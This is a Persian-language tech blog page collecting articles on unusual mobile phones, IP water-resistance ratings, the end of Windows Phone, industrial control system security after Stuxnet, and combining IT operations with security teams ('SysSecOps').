بانک آموزشی

بانک آموزشی

نرم افزار - سخت افزار - طراحی - برنامه نویسی _ ویروس شناسی ...
بانک آموزشی

بانک آموزشی

نرم افزار - سخت افزار - طراحی - برنامه نویسی _ ویروس شناسی ...

با 10 گوشی موبایل عجیب تاریخ آشنا شوید

هر چند که طراحی گوشی‌های موبایلِ شرکت‌های مختلف تا حد زیادی به هم نزدیک شده، اما 

در این میان محصولاتی بوده‌اند که با هدف شکستن این شباهت‌ها، قصد ایجاد یک انقلاب را

 داشته‌اند. انقلاب‌هایی که با شکست رو به رو شده‌اند تا این گوشی‌ها به عنوان عجیب‌ترین

 گوشی‌های موبایل شناخته شوند.

گوشی‌های هوشمند این روزها رفیق گرمابه و گلستان همه‌ی ما شده‌اند. زمانی که پرچم‌داران جدید معرفی می‌شوند، همه ما دوست داریم یکی از آن‌ها را داشته باشیم. شاید بسیاری از ما به خاطر نیاوریم که چند سال پیش چگونه با گوشی‌های غیر لمسی سر می‌کردیم، یا شاید صفحات کوچک 3 تا 4 اینچی امروز برای بسیاری از ما غریب باشد. اگر با قلم استایلوس سری نوت کار کرده باشید، احتمالا دیگر نمی‌توانید گوشی‌های بدون قلم را تحمل کنید و دوربین‌های دوگانه احتمالا شما را به خود معتاد خواهند کرد. با این حال چه در گذشته و چه امروز گوشی‌های عجیب و غریبی نیز تولید می‌شوند که احتمالا بسیاری از ما را متعجب می‌کنند. در این مطلب قصد داریم مروری داشته باشیم بر 10 گوشی عجیب و غریب تاریخ. با جی‌اس‌ام همراه باشید.

به نظر می‌رسد کسی که در شرکت نوکیا وظیفه‌ی تایید نهایی طراحی گوشی‌ها را بر عهده داشته، هنگام تایید طراحی گوشی N-Gage توسط جادوگری جادو شده و از به زبان آوردن کلمه «نه» عاجز بوده است. طراح این گوشی متوجه نبوده که افراد دوست ندارند گوشی‌شان شبیه یک کنسول بازی دستی باشد و دست به طراحی این چنینی زده است.

به نظر می‌رسد سال 2003 سال شکوفایی خلاقیت طراحان نوکیا بوده است. این شرکت فنلاندی در این سال علاوه بر N-Gage گوشی مربعی نوکیا 7600 را نیز روانه بازار کرد که از نظر شکل و شمایل بیشتر شبیه دماسنج‌های دیجیتال دهه 80 میلادی بود! انگار طراح می‌خواسته محصولی طراحی کند که وقتی در جیبتان می‌گذارید هیچ کس به ذهنش خطور هم نکند که در جیبتان یک تلفن همراه قرار دارد!

یکی دیگر از عجیب‌ترین طراحی‌های گوشی‌های موبایل که چندان هم قدیمی نیست، متعلق به شرکت بلک بری و گوشی Blackberry Passport است. این گوشی که در سال 2014 عرضه شد صفحه نمایش 4.5 اینچی مربعی شکل و صفحه کلید حساس به فشار داشت که شکل و شمایلی عجیب به آن بخشیده بود. تصویری که در زیر مشاهده می‌کنید از تبلیغات شرکت بلک‌ بری برای این گوشی بود که عنوان می‌کرد با بلک بری پاسپورت زاویه دید گسترده‌تری در تلفن همراه خود خواهید داشت، هر چند به این نکته توجه نشده بود که شاید در دست گرفتن این گوشی چندان راحت نباشد. ضمن اینکه بعید است به راحتی از جیب در بیاید!

احتمالا آخرین گوشی مربعی که در تاریخ صنعت تلفن همراه ساخته شده، Motorola Flipout باشد. گوشی موبایلی که سال 2010 به بازار عرضه شد و البته به کاربر حس یک گوشی موبایل را القا نمی‌کرد. یک گوشی مربعی که با چرخاندنش می‌توانستید به صفحه کلید فیزیکی‌اش دسترسی پیدا کنید. گرچه شاید در ابتدا این ایده جالب به نظر برسد، اما احتمالا بعد از چند روز کار کردن با این گوشی با تمام وجود آرزو می‌کردید که ای کاش گوشی دیگری خریده بودید.

بی‌شک گوشی‌های کشویی و تاشو در تاریخ گوشی‌های موبایل جایگاه قابل توجهی دارند، اما در پاره‌ای از مواقع طراحان روی به طراحی‌های عجیب و غریبی آورده‌اند که به دل هیچ کس نمی‌نشیند. یکی از این طراحی‌ها به گوشی Sidekick تعلق دارد. در این گوشی بر خلاف سایر گوشی‌ها با زدن دکمه‌ای صفحه نمایش مسیری نیم‌دایره را طی کرده و به بالای صفحه کلید منتقل می‌شد.

شاید برایتان عجیب باشد که یک رستوران زنجیره‌ای دست به تولید یک گوشی هوشمند بزند، اما این اتفاق رخ داده و مدت زیادی هم از آن نگذشته است! KFC رستوران زنجیره‌ای آمریکایی 30 سال پیش اولین شعبه خود را در چین افتتاح کرد و از آن زمان در این کشور آنقدر محبوبیت یافت که تبدیل به محبوب‌ترین رستوران زنجیره‌ای خارجی در چین شد. امسال و در جشن سی سالگی ورود KFC به چین این شرکت با همکاری هوآوی یک گوشی هوشمند ویژه به رنگ قرمز و با ویژگی‌های نرم‌افزاری مخصوص و با تصویری از کلنل ساندرز در قاب پشتی، وارد بازار چین کرد. البته این گوشی در تعداد محدود 5000 دستگاه به بازار عرضه شد.

افراد زیادی در سطح جهان هستند که علاقه‌ای به خوردن گوشت ندارند و حتی لباس‌های چرم نمی‌پوشند، زیرا معتقدند در تولید این محصولات به حیوانات ظلم می‌شود. این افراد احتمالا از محصول 8000 دلاری شرکت Vertu متنفر خواهند شد. Signature Touch محصولی است که با قاب چرم به فروش می‌رسد که البته قاب‌های چرم این محصول تنوع فراوانی دارد، از قاب چرم خالص گوساله گرفته تا چرم تمساح!

اگر قیمت 8 هزار دلاری گوشی ورتو هوش از سرتان برده، بهتر است کنترلتان را حفظ کنید، چون گوشی بعدی دو برابر گوشی‌های چرمی ورتو قیمت دارد! گوشی Solarin که محصولی از شرکت Sirin Labs است و مانور فوق‌العاده‌ای روی جنبه‌ی امنیتی آن شده، قیمت احمقانه‌ای دارد: 16 هزار دلار!

گوشی عجیب و غریب دیگری که اکنون با قیمتی حدود 25 دلار می‌توان آن را از فروشگاه آمازون سفارش داد، گوشی‌ بلوتوثی است. این گوشی مانند یک هدست بلوتوث طراحی شده که می‌توان در آن یک سیم‌کارت قرار داد و با صفحه‌کلید روی آن شماره‌گیری کرد. فقط باید توجه کنید که وقتی این گوشی را به گوش خود وصل می‌کنید قیافه‌ی احمقانه‌ای پیدا می‌کنید؛ شبیه لباسی که هنوز تگ قیمتش کنده نشده است.

اما آخرین گوشی عجیب این لیست محصولی از شرکت معتبر دوربین‌سازی RED است. این گوشی که تنها چند ماه از معرفی آن می‌گذرد قیمت عجیب 1200 دلاری دارد که باعث می‌شود قیمت آیفون 10 در مقابل آن پیش پا افتاده به نظر برسد. معلوم نیست شرکت RED با معرفی این گوشی چه طیفی از جامعه خریداران را هدف گرفته است. ضمن اینکه به جز صفحه نمایش 5.7 اینچی و ماژولار بودن، اطلاعات دیگری از آن منتشر نشده است. این گوشی به گفته‌ شرکت RED سال آینده به بازار عرضه می‌شود.


استاندارد ضدآب IP67 یا IPXX دقیقاً به چه معناست؟

گوشی‌های هوشمند در کنار قیمتی که دارند، اطلاعات کاربران را نیز با خود حمل می‌کنند، این امر باعث شده است تا نگه‌داری از آنها اهمیت بیشتری پیدا کند، از طرف دیگر تمامی تولید‌ کننده‌های گوشی‌های هوشمند نیز برای محصولات خود استانداردهای مقاومتی را اعمال می‌کنند که به این استانداردها به اختصار IP می‌گوییم، این استانداردها به لحاظ مقاومت گوشی یا تجهیزات الکترونیک با IP‌های متفاوت شناخته می‌شوند. به همین منظور در این متن نگاهی به استانداردهای مقاومتی گوشی‌های همراه هوشمند خواهیم داشت.

عبارت IP که در استانداردهای تجهیزات الکترونیک به کار می‌رود به معنای میزان مقاومت این تجهیزات است. استانداردهای مقاومتی بی دلیل به تجهیزات الکترونیک داده نمی‌شود و برای دریافت استاندارد، این محصولات باید از آزمایش‌های سخت مقاومتی سربلند بیرون آیند.

از آنجایی که میزان مقاومت تجهیزات الکترونیک با یکدیگر متفاوت است،‌استاندارد IP اختصاص داده شده نیز متفاوت خواهد بود، این تفاوت را با شماره‌هایی در کنار عبارت IP می‌توان تشخیص داد.

androidpit-wet-samsung-galaxy-s5

در اینجا بد نیست نگاهی بیاندازیم به نحوه خواندن استاندارد مقاومت IPXX

در کنار عبارت IP شاهد دو عدد هستیم. عدد اول از سمت چپ بیانگر میزان مقاومت بدنه دستگاه الکترونیک است و عدد دوم به معنای میزان مقاومت دستگاه الکترونیک در برابر آب می‌باشد. ناگفته پیداست که هر اندازه این اعداد بزرگ‌تر باشند، میزان مقاومت دستگاه الکترونیک نیز بیشتر خواهد بود.

لازم به ذکر است که منظور از مقاومت در اینجا تنها مقاومت در برابر آب نیست و پارامترهای دیگری نظیر توان تحمل فشار آب و سایر فاکتورهای مقاومتی نیز در اختصاص این استاندارد تاثیر دارد. از طرف دیگر این نکته را نیز در نظر داشته باشید که این استاندارد توسط اتحادیه جهانی تجهیزات دیجیتال به دستگاه‌های الکترونیک اعطا می‌شود و شرکت‌ها نمی‌توانند برای محصولات خود استاندارد صادر کنند. با این حساب بد نیست نگاهی به مقدار اولین عدد حاضر در استاندارد مقاومت IP در تجهیزات الکترونیک و گوشی‌های هوشمند داشته باشیم:

معنای اولین عدد از سمت چپ در استاندارد مقاومتی IP:

  • عدد صفر به معنای مقاوم نبودن گوشی است. (گاهی اوقات به جای صفر عبارت X هم استفاده می‌شود.)
  • عدد یک بیانگر مقاومت در برابر اشیا سخت تا میزان ۵۰ mm³ است.
  • عدد دو بیانگر مقاومت در برابر اشیا سخت تا میزان ۱۲ 12 mm³ است.
  • عدد سه بیانگر مقاومت در برابر اشیا سخت تا میزان ۲.۵ mm³ است.
  • عدد چهار بیانگر مقاومت در برابر اشیا سخت تا میزان ۱ mm³ است.
  • عدد پنج بیانگر مقاومت نسبی در برابر گرد و خاک است.
  • عدد شش بیانگر مقاومت کامل در برابر گرد و خاک است.

معنای دومین عدد از سمت چپ در استاندارد مقاومتی IP:

  • عدد صفر به معنای مقاوم نبودن گوشی است.
  • عدد یک به معنای مقاومت گوشی در برابر ریختن قطره‌های آب است.
  • عدد دو به معنای مقاومت در برابر ریختن قطر‌ه‌های آب در زاویه عمودی ۱۵ درجه است.
  • عدد سه به معنای مقاومت در برابر ریختن قطره‌های آب در زاویه عمودی تا ۶۰ درجه است.
  • عدد چهار به معنای مقاومت در برابر ریختن آب از هر زاویه‌ای است.
  • عدد پنج به معنای مقاومت در برابر ریختن آب زیاد از هر زاویه‌ای است.
  • عدد شش به معنای مقاومت در برابر ریختن و نفوذ آب تاحدودی به درون قاب گوشی است.
  • عدد هفت به معنای مقاومت در برابر فرو بردن گوشی در زیر آب به میزان ۱۵ سانتی‌متر تا یک متر است.
  • عدد هشت به معنای مقاومت کامل در برابر فرو بردن گوشی در زیر آب و تحمل فشار آب است.

در این جا ذکر این نکته نیز لازم است که میزان مقاومت گوشی در زیر آب، رابطه مستقیمی با فشار آب وارده بر گوشی دارد. برای نمونه تفاوت زیادی میان ریختن آب بسیار زیاد و با فشار بر روی گوشی با افتادن گوشی در جوی آب وجود دارد.

به این نکته هم توجه کنید که حتی اگر گوشی دارای بالاترین استاندارد در برابر گرد و خاک هم باشد باز هم به این معنا نیست که همان گوشی باید مقاومت خوبی هم در برابر آب داشته باشد.

چه گوشی‌هایی در برابر آب مقاوم هستند؟

اکنون که با استانداردهای مقاومتی موجود در گوشی‌های هوشمند‌ آشنا شدید، بد نیست نگاهی به فهرست گوشی‌های هوشمند دارای این استانداردها هم داشته باشیم. در این زمینه برای نمونه می‌توان به گلکسی S5 سامسونگ اشاره کرد که استاندارد IP67 را داراست، از طرف دیگر اکسپریا زد ۲ سونی هم افتخار داشتن استاندارد IP58 را یدک می‌کشد. همان‌‌گونه که اشاره شد استانداردهای حاضر در این دو گوشی تفاوت‌های زیادی با هم دارند، گلکسی S5 کاملا در برابر گرد و خاک مقاوم است اما اکسپریا زد ۲ را با اطمینان خاطر می‌توان برای مدت طولانی در زیر آب نگه داشت.

اینجاست که در حین خرید پیشنهاد می‌شود حتما به استاندارد به کار رفته برای مقاومت گوشی توجه کنید. گوشی‌های زیادی در بازار یافت نمی‌شود که در برابر گرد و غبار و نفوذ آب، کاملا مقاوم باشند و در بین شرکت‌های تولید کننده گوشی‌های همراه هوشمند، تنها سونی است که تمایل زیادی به رعایت استانداردهای مقاومتی در سطح بالا در گوشی‌های هوشمند تراز اول خود دارد.

از طرف دیگر سامسونگ گوشی‌های تراز اولی در بازار دارد که از هیچ کدام از این استانداردها بهره نمی‌گیرند، گلکسی نوت ۴ و گلکسی S6 را می‌توان در این دسته قرار داد.

به هر ترتیب اگر قصد خرید گوشی هوشمندی را دارید و مقاومت این گوشی در برابر آب و گرد و خاک برای شما مهم است، برای راحتی شما در پایین لیستی از گوشی‌های هوشمند اخیر دارای استانداردهای مقاومتی را گرد آورده‌ایم:

  • اکسپریا زد سونی با استاندارد IP57
  • اکسپریا زد ۱ سونی با استاندارد IP58
  • اکسپریا زد ۲ سونی با استاندارد IP58
  • اکسپریا زد ۳ سونی با استاندارد IP68
  • اکسپریا زد ۳ سونی با استاندارد IP68
  • اکسپریا زد ۵ و زد ۵ کامپکت سونی با استاندارد IP68
  • اکسپریا ایکس پرفورمنس با استاندارد IP68
  • اکسپریا ایکس زد سونی با استاندارد IP68
  • گلکسی S4 اکتیو سامسونگ با استاندارد IP67
  • گلکسی S5 سامسونگ با استاندارد IP67
  • گلکسی S5 اکتیو سامسونگ با استاندارد IP67
  • گلکسی S5 مینی سامسونگ با استاندارد IP67
  • گلکسی S7 و S7 اِج سامسونگ با استاندارد IP68
  • گلکسی ایکس کاوِر ۳ سامسونگ با استاندارد IP67
  • گوشی Quechua Phone 5 با استاندارد IP54
  • آیفون ۷ و آیفون ۷ پلاس با استاندارد IP67

مایکروسافت مرگ ویندوز فون را تایید کرد

مایکروسافت که بالاخره پس از چندین سال کار بر روی ویندوز فون، تایید کرد که این سیستم‌عامل عملا مرده است و هیچ به‌روزرسانی جدیدی برای آن منتشر نخواهد شد.

جو بلفیوری، نایب رئیس مایکروسافت، در یک سری توییت افشا کرد که غول نرم‌افزاری دنیا دیگر قصد توسعه‌ی قابلیت‌ها یا سخت‌افزارهای جدید برای ویندوز 10 موبایل را ندارد. در حالی که طرفداران ویندوز فون امیدوار بودند مایکروسافت سیستم‌عامل موبایلی‌اش را با ویژگی‌های جدید به‌روز کند، اکنون دیگر کاملا مشخص شده که این شرکت ویندوز موبایل را در وضعیت سرویس‌دهیِ صرف قرار داده و تنها به رفع باگ‌ها پرداخته و برای کاربران فعلی به‌روزرسانی‌های امنیتی منتشر می‌کند.

بلفیوری در این باره می‌گوید:

البته که ما به پشتیبانی از این پلتفرم ادامه خواهیم داد... باگ‌ها برطرف و به‌روزرسانی‌های امنیتی منتشر می‌شوند، اما تمرکز ما روی ایجاد ویژگی‌های جدید و ساخت سخت‌افزارهای نو برای این پلتفرم نیست.

اکنون که مایکروسافت در حال به پایان رساندن مراحل آماده‌سازی به‌روزرسانی پاییزه ویندوز 10 با نام Creators Update است، کاملا واضح است که این شرکت در این حین هیچ کار خاصی برای ویندوز 10 موبایل نکرده است. در واقع ویندوز 10 موبایل در نسخه‌ی Feature2 رها شده و این موضوع باعث ناامیدی طرفدران شده است.

نزدیک به بیش از یک سال است که ویندوز فون عملا مرده به حساب می‌آید، اما مایکروسافت در این مدت هرگز به صورت رسمی زیر بار قبول این موضوع نرفته بود. کسب و کار ناموفق مایکروسافت در بخش موبایل، سال گذشته باعث شد هزاران کارمند این شرکت تعدیل شوند. در کنفرانس اخیر مایکروسافت، ساتیا نادلا مدیرعامل این شرکت عنوان کرد که تمرکز شرکت متبوعش از موبایل و فضای ابری بر فضای ابری هوشمند انتقال پیدا کرده است. تمرکز در این حوزه بدان معنیست که مایکروسافت در حال کار بر روی تکنولوژی‌های چند دستگاهی و مبتنی بر فضای ابری است که شاید فقط محدود به ویندوز نباشد.

بلفیوری همانند بیل گیتس اعتراف کرده که از یک گوشی اندرویدی استفاده می‌کند و عنوان کرده که مایکروسافت از آن دسته کاربران ویندوز 10 که می‌خواهند از اندروید یا iOS بر روی گوشی‌شان استفاده کنند، پشتیبانی می‌کند. یکی از دلایلی که مایکروسافت قید ویندوز فون را زده آن است که در طول عمر ویندوز فون، این سیستم‌عامل هرگز از سوی توسعه‌دهندگان نرم‌افزار جدی گرفته نشد. مایکروسافت با اپ استور ویندوز فونش مشکلات فراوانی داشت و از متقاعد کردن توسعه‌دهندگان برای انتشار نرم‌افزارشان در پلتفرم ویندوز موبایل عاجز بود. بلیفوری در این زمینه توضیح می‌دهد:

ما بسیار تلاش کردیم که توسعه‌دهندگان را تشویق کنیم. به آن‌ها پول پرداخت کردیم، برایشان برنامه نوشتیم... اما تعداد کاربران بسیار کمتر از آن چیزی بود که بیشتر شرکت‌ها تمایل به سرمایه‌گذاری داشته باشند...

حال مشخص است که مایکروسافت این واقعیت که مردم نیازی به ویندوز بر روی گوشی‌های موبایلشان ندارند را پذیرفته است. برنامه‌نویسان در چند سال اخیر بر روی اپلیکیشن‌های اندرویدی و آی‌او‌اسی تمرکز کرده‌اند. مایکروسافت نیز اخیرا اعلام کرده که مرورگر خود، مایکروسافت اج، را برای آی‌او‌اس و اندروید منتشر می‌کند و به نظر می‌رسد این شرکت در حال حاضر بیشتر بر روی این موضوع کار می‌کند که نرم‌افزارهای دسکتاپ بیشتری را برای موبایل منتشر کند تا کاربران بتوانند راحت‌تر بین موبایل و رایانه‌شان ارتباط برقرار کنند.

مایکروسافت حتی اخیرا یک لانچر اندرویدی منتشر کرده که ویژگی‌های منحصر به فردی به خصوص در زمینه ارتباط با رایانه دارد. به همین ترتیب انتظار داریم در آینده شاهد انتشار محصولات نرم‌افزاری بیشتری از این قبیل از طرف مایکروسافت باشیم. در حال حاضر بعید به نظر می‌رسد که سرفیس بوک، گوشی موبایلی که چند سال اخیر شایعات بسیاری پیرامونش وجود داشته، در آینده معرفی شود و نباید انتظار رونمایی سخت‌افزارهای سازگار با ویندوز 10 موبایل را داشته باشیم. مایکروسافت از ویندوز موبایل دل کنده و به سرمایه‌گذاری روی iOS و اندروید روی آورده و شاید بهتر باشد وفاداران فعلی ویندوز موبایل نیز کم کم به فکر به فراموشی سپردن این سیستم‌عامل بیفتند.

امنیت سیستم های کنترل صنعتی

گسترش حملات سایبری به تاسیسات صنعتی و سیستم های کنترل صنعتی در کل دنیا و بویژه در ایران، به روشنی مشخص می کند که هیچ کسب و کار یا صنعتی از این گونه حملات سایبری در امان نبوده و نیست.

security_industry
تمام آمارهای مستند نشان می دهد که تهدیدات امنیت سایبری شامل ویروس ها و بدافزارها در صنعت بویژه در سیستم های کنترل صنعتی رو به افزایش است در حالی که تا پیش از این به نظر می رسید تهدیدات سایبری محدود به نفوذ به اطلاعات مالی و اداری سازمانها باشد.
تعداد آسیب پذیری های شناسایی شده در صنایع و سیستم های کنترل صنعتی و PLCها در سال های اخیر افزایش چشمگیری داشته است:

security_industryتعداد آسیب پذیری های صنعتی گزارش شده به ICS-CERT

security_industry
تعداد آسیب پذیری های گزارش شده به ICS-CERT در صنایع مختلف در سال های 2011 تا 2015

امنیت سایبری شبکه‌های صنعتی و سیستم های کنترل صنعتی چالشی است که صنایع مختلف و کارخانه ها با آن مواجهند.
امروره بدافزارها آنقدر قدرت یافته اند که از نقاط آسیب پذیر سیستم وارد سیستم کنترل صنعتی شوند، باعث اختلال در فرایند کنترل شده، جاسوسی کنند، خط تولید را مختل کنند و حتی باعث انفجار در صنایع مختلف شوند.
ایزوله بودن شبکه صنعتی از اداری برای استقرار امنیت کافی نیست؟
تجربه ثابت کرده است جدا بودن شبکه صنعتی از شبکه اداری نمی تواند تضمینی برای امنیت آن باشد. ویروس Stuxnet که در سال 88 به سیستم کنترل صنایع ایران از جمله تاسیسات صنعتی نفوذ کرد توانست به تجهیزات کنترل و PLCها نفوذ کند. این ویروس به شبکه های صنعتی بسیاری از صنایع نفوذ کرد.

security_industry
نتیجه: شبکه های صنعتی ایزوله هم شبکه های لزوماً امنی نیستند و نیاز به ایمن سازی و تست و بازرسی از نظر امنیتی دارند.
نکته جالب تر اینجاست که بر اساس آمار، هنوز هم بیش از 70 درصد شبکه های صنعتی هنوز در برابر ویروس Stuxnet آسیب پذیر هستند!
ویروس Stuxnet می تواند بدون اطلاع اپراتور با ورود به اتاق کنترل و نفوذ به PLC باعث تغییر ضرایب PID Controller شده و منجر به انفجار شود!
از اینها گذشته ویروس Stuxnet یک ویروس تمام شده و به تاریخ پیوسته نیست! شناسایی نسل های جدیدی از Stuxnet برای حمله به سیستم‌های کنترل صنعتی گزارش شده است. بدافزار اسرارآمیزی که به تازگی شناسایی شده، می تواند سیستم های کنترل صنعتی و SCADA را هدف قرار دهد.
امنیت در اتوماسیون صنعتی:  
امنیت در سیستم‌های کنترل صنعتی نه تنها در زمان طراحی و پیاده‌سازی، بلکه در زمان پشتیبانی و نگهداری سامانه نیز باید ادامه یابد. به‌طور معمول شرکت‌های سرویس‌دهنده در این حوزه، پشتیبانی از سامانه نصب شده را تنها محدود به رفع خرابی و یا اشکالات سیستم می‌دانند در حالی که بازرسی ها و تست های دوره ای امنیتی مهمترین بخش پس از اتمام پیاده‌سازی و در زمان بهره برداری به حساب می‌آید.
بسیاری از تجهیزات نصب شده ممکن است دارای آسیب‌پذیری‌هایی باشند که مهاجمین می‌توانند توسط آن‌ها به شبکه کنترل صنعتی نفوذ کرده، اطلاعات را به سرقت برده و یا اختلال ایجاد کنند. آسیب‌پذیری‌ها ممکن است در معماری، تجهیزات، پیکربندی و یا موارد دیگر از اجزای سیستم کنترل صنعتی باشد.
امروزه یک ویروس و یا بدافزار این قابلیت را دارد که در دل صنایع و سیستم های کنترل صنعتی نفوذ کند و مثل یک بمب ساعتی باعث انفجار در صنایع مختلف شود و یک کشور را فلج کند!
بر اساس آمار منتشر شده توسط شرکت کسپرسکی، ایران در صدر حملات سایبری به سیستم های کنترل صنعتی قرار دارد:


این دیوارها را خراب کنید

اکنون زمان این است که امنیت و عملیات IT باهم ادغام شوند و اطلاعات به اشتراک گذاشته شود و ارتباطات بهبود یابند. 
ما به SysSecOps نیاز داریم. تیم های عملیاتی  IT و مسئولین امنیت شرکت ها همگی مشاغل حیاتی دارند. آنها اکثر اوقات بطور مستقل کار می کنند. با این وجود، زمانی که حوادثی رخ میدهند و یا احتمال ورود غیر مجاز به سیستم وجود دارد، حجم بالای اطلاعات آنها بدین معناست که عکس العمل به این حوادث سرعت پایینی دارد و احتمالا تاثیرگذار نیست. زمان این است که عملیات IT و امنیت بطوری باهم ترکیب شوند که به عملکرد روزانه ی آنها خدشه ای وارد نشود، اما امکان اشتراک اطلاعات و در صورت لزوم ایجاد ارتباطات موثر فراهم گردد.ما این روش را SysSecOps می نامیم: سیستم ها و عملیات امنیتی. 
برای بسیاری از سازمانها هجوم SysSecOps در نقطه پایان آغاز میشود. ادغام امنیت نقطه پایان و هماهنگی سازمانی نکاتی کلیدی برای ساخت یک روش SysSecOps برای امنیت شرکتی هستند. در حقیقت بسیاری از هک های بزرگ پنج سال اخیر از طریق پاسخگویی سازمانی بهتر و ادغام ابزار امنیتی پیشگیری شده اند. 
بیش از نیمی (53%) از شرکت کنندگان در تحقیق امنیت Futuriom سال 2017 باوردارند که ادغام تکنولوژی امنیت مشکل بزرگی در امن سازی شرکت هاست است. به این دلیل است که ادغام ابزار های امنیتی یکی از اهداف اصلی SysSecOps است که می تواند تاثیر مثبتی در امن سازی شرکتی داشته باشد. 
بدافزار و phishing همچنان خطرهای مهمی برای امنیت شرکتی باقی مانده اند و نیاز به بررسی سیستمی و محافظت از نقظه پایان ها بصورت ادغامی دارند. با این حال اهداف امنیتی متضاد درون یک سازمان می تواند مانعی برای امن سازی نقاط پایان و سیستم ها باشد. از دید SysSecOps بیشتر ابزار امنیت نقاط پایان موجود کارایی کافی ندارند زیرا با اجزای امنیتی دیگر ادغام نشده اند. 
SysSecOps در نقطه پایان
بررسی تعداد فراوان سیستم ها، سرورها و دستگاه های متصل، به معنای روبرویی با پیچیدگی هایی بیشتر از قبل است. مجازی سازی، سرویس های ابری، کارکنان زیاد از راه دور و تعداد رو به افزایش نقاط پایان-که شامل نقاط پایان متصل به مشتری ها، شرکا و کارکنان میشود- بدین معناست که سیستم ها دیگر توسط مرزهای شرکتی محدود نمیشوند.
در شرکت های بزرگ، کارکنان و نقاط پایان شبکه از تمام دنیا به اطلاعات دسترسی دارند. همزمان،تهدید های منابع IT در سطحی جهانی قرار دارند و هرروزه حملات مجازی بزرگی بوقوع می پیوندد که منجر به اطلاعات سرقت شده، ضررهای مالی شرکت ها و تجاوز به حریم خصوصی می گردد. به این علت است که اقدامات امنیتی باید حفظ نقطه پایان را در مرکز هرگونه سیاست گذاری موثر قرار دهند. چه کسی مالک نقاط پایان است؟ عملیات های IT. چه کسی مالک محافظت است؟ امنیت. به همین علت این دو تیم باید باهم کار کنند. 
بسیاری از سازمان های امنیتی به این امر آگاهند که پلتفرم های محافظت پیشگیرانه از نقطه پایان قادر به انجام کار زیادی نیست. بنابراین پلتفرم های شناسایی و پاسخگویی به نقطه پایان (EDR) به درستی به مرکز توجه صنعت امنیت تبدیل شده اند. (EDR) مشکلات حقیقی را حل میکند. 
متاسفانه بیشتر محصولات EDR خودحجم اطلاعاتی هستند. آنها بخوبی یا اصلا با ابزار امنیت و کنترل ریسک اطراف خود و یا با پلتفرم های عملیات IT ادغام نمی شوند. برای امن سازی و حفاظت از دارایی های متصل، کارشناسان امنیت و مدیران IT به دانش و شفافیت بیشتر در مورد این نقاط پایان نیاز دارند، نه سلوشن های مستقل. آنها همچنین نیاز دارند اطلاعات را به اشتراک بگذارند تا یک  منبع واحد حقیقت ایجاد شود و حل مشکلات ریسک و امنیت بصورت سریع تر و کارامد تر انجام گیرد.

عملیات IT و امنیت نیاز به یک روش هماهنگ شده دارند
یک تحقیق جدید که توسط Futuriom انجام گرفت این نتیجه را حاصل کرد که مسئولین مدیریت سیستم و امنیت به ادغام بیشتر بین سیستم IT و عملیات امنیتی تمایل دارند، که شامل ابزار و پروسه ها و هماهنگی بودجه های مرتبط اختصاص یافته برای این سازمان هاست میشود. آنها اعتقاد دارند که شفافیت امنیت ادغام شده مشکل اصلی است. بیشتر آنها اعلام کردند در زمان امن سازی محیط نقطه پایان  "دشواری ادغام ابزار امنیتی بسیار زیاد" مساله ی مهمی است. علاوه بر این در پاسخ به این سوال که "چه کاری برای بهبود امنیت IT در سازمان شما مفید تر است؟"، کاربران نهایی "ادغام بهتر بین مدیریت سیستم و ابزار امنیت عملیات" را بعنوان یکی از مفیدترین روش ها انتخاب کردند. 
این یافته ها در میان مدیران سیستم IT، کارشناسان امنیت و مدیران شبکه ثابت بود. همه ی آنها میخواهند بررسی سیستمی و عملیات امنیتی بهتر و هماهنگ تری را ببینند. نیاز به ادغام بهتر بررسی سیستم، و ابزار امنیتی روشی است که ما از آن با نام SysSecOps یاد میکنیم. 
هدف SysSecOps ارائه ی توانایی با دید بهتر و کلی تر به تیم های IT و امنیت برای مدیریت ریسک کلی وحفظ امنیت محیط نقطه پایان است. 
بعنوان یک مثال از هک که در آن روش SysSecOps می توانست مفید واقع شود، حمله به eBay را در نظر بگیرید. هکرها به اطلاعات 145 کاربر دسترسی پیدا کردند که شامل دسترسی غیرمجاز به بانک داده ها شامل اسامی، آدرس ها، شماره تلفن ها، تاریخ های تولد، آدرس های ایمیل و پسورد های رمزگذاری شده ی آنها بود. 


در پاسخ eBay اعلام کرد: مهاجمین مجازی به اطلاعات ورود تعداد محدودی از کارکنان دسترسی پیدا کردند و از این طریق بصورت غیر مجاز  به شبکه ی شرکتی eBay  ورود یافتند. ما در حال همکاری با نیروهای قانونی و کارشناسان امنیتی برتر هستیم تا موضوع را بدقت بررسی کنیم. دراین زمان قصد اعلام  اطلاعات بیشتری را نداریم." به گفته ی لیرون دامری مدیر ارشد عملیاتی شرکت کارشناسی امنیت Forter ،شرکت  eBay اقدامات امنیتی پیشگیرانه ی معمول مثل جداسازی و رمزدهی اطلاعات مشتریان را انجام داده بود، اما تکنیک های پیشرفته تری را می توانست بکاربرد. بعنوان مثال میتوانست برای ثبت تراکنش ها و رد تراکنش هایی که بنظر تقلبی می رسیدند از تحلیلگر رفتاری استفاده کند. 
ایجاد یک استراتژی SysSecOps
تحقیقات ما درمورد نیاز به SysSecOps گرایش های قابل توجه زیادی نشان داده اند که شامل نیاز به ادغام ابزار مدیریت سیستم و امنیت موجود، هماهنگی بودجه دهی و برنامه ریزی در حدود سازمانی و تمرکز بر استفاده از اطلاعات شفافیت نقطه پایان برای پیشبرد بهبود های تحلیلی و ایجاد توانایی پیش بینی امنیتی و خطرات سیستمی می باشد. 
اما این کار چطور انجام میشود؟ با نگاهی به شکست های بزرگ امنیتی و سیستمی در چند سال اخیر مشخص است که چنین روشی نیاز به قدرت رهبری قوی در تمام سازمان دارد که از سطح مدیریت و هیات مدیره ی سازمان نشات میگیرد. اگر رهبریت سازمان متوجه این اهداف حیاتی نباشد روش SysSecOps قادر به پیدایش و پیشرفت نخواهد بود. 
بعضی عناصر کلیدی در استراتژی SysSecOps شامل موارد زیر هستند:
-    کاربران حرفه ای IT  و امنیت خواستار ادغام بهتر بین ابزار هستند، که نیازمند هماهنگی بین بودجه بندی و برنامه ریزی سازمانی است
-    برای رسیدن به ادغام SysSecOps، بودجه های مدیریت سیستم و امنیت میبایست در مرزهای سازمانی هماهنگ شوند تا برنامه ریزی های لازم برای رسیدن به اجزای تکنولوژی لازم انجام شود
-    تاکید بر تکنولوژی باید به سمت ساخت موتورهای هماهنگ شده ی جمع آوری اطلاعات و تحلیل باشد
-    SysSecOps برای نقطه پایان بر پایه ای از شفافیت نقطه پایان، کنترل و ادغام در یک اکوسیستم امنیتی بزرگتر قرارداشته باشد
